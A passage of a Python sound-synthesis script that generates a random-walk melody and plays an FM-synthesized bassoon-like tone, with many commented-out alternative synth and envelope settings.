return list(Sampler(input, DEFAULT_SAMPLERATE, dur))
def random_walk ():
import random
freq = 440
while True:
if random.random() < 1/5:
yield (None, 0.25)
else:
yield (freq, 0.25)
steps = random.randint(-12, 12)
freq *= 2**(steps/12)
freq = clamp(freq, 20, 10000)
if __name__ == '__main__':
#rw = random_walk()
#synth = Synth(modifier=Vibrato(freq=3.2), oscillator=Square, A=0.13, D=0.03, S=0.5, R=0.5,
#synth = Synth(oscillator=FourierSaw(20), A=0.03, D=0.03, S=5, R=0.5,
#synth = Synth(oscillator=Saw, A=0.03, D=0.03, S=5, R=0.5,
#synth = Synth(oscillator=FourierTriangle(80), A=0.03, D=0.03, S=5, R=0.5,
#synth = Synth(oscillator=Sine, A=0.05, D=0.03, S=5, R=0.5,
#modifier=Vibrato(freq=4, cents=25),
#synth = Synth(oscillator=FMSynth(B=5, H=1), A=0.03, D=0.03, S=1, R=0.5,
#steps = (
#(440, 0.25),
#(440 * 2**(2/12), 0.25),
#(440 * 2**(3/12), 0.25),
#(None, 1.25),
#(220, 0.25),
#(220 * 2**(2/12), 0.25),
#(220 * 2**(3/12), 0.25),
#))
#play(synth, 4)
#play(Amp(Mult(-1, FourierSaw(20)(4)), synth), 4)
#play(Amp(Mult(-1, Saw(4)), synth), 4)
#synth = Synth(oscillator=FMSynth(B=LinearRamp(0,2,0,10), H=0.1),
envelope = SegmentedRamp(2,
#steps=((0.01, 1), (0.4, 0.7), (0.9, 0.9), (1, 0))); H=1;B=5 # Brassy?
#steps=((0.06, 0.5), (0.1, 1), (0.9, 1), (1, 0))); H=1/3; B=2 # Woodwind?
steps=((0.06, 0.5), (0.1, 1), (0.9, 1), (1, 0))); H=0.2; B=1.5 # Bassoon?
#steps=((0.1, 1), (0.75, 1), (1, 0))); H=2/3; B=2 # Clarinet?
oscillator = FMSynth(ConstFrequency(400), B=Mult(B, envelope), H=H)
synth = Mult(envelope, oscillator)
play(synth, 2)
#steps=iter([next(rw) for x in range(40)] + [(None, 0.5)]))
#write(synth, 10.5)
#import guitar_wave
#class Guitar (PhasedSignal):
#_phase = guitar_wave.data
#from music import PianoRoll
#import tabreader
#synths = [Synth(steps=PianoRoll(33, n), oscillator=Guitar(), A=0.03, D=0.05,
#R=0.05)
#for n in tabreader.read(tabreader.ex_tabs)]
#play(Mixer(synths), 10) #38)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.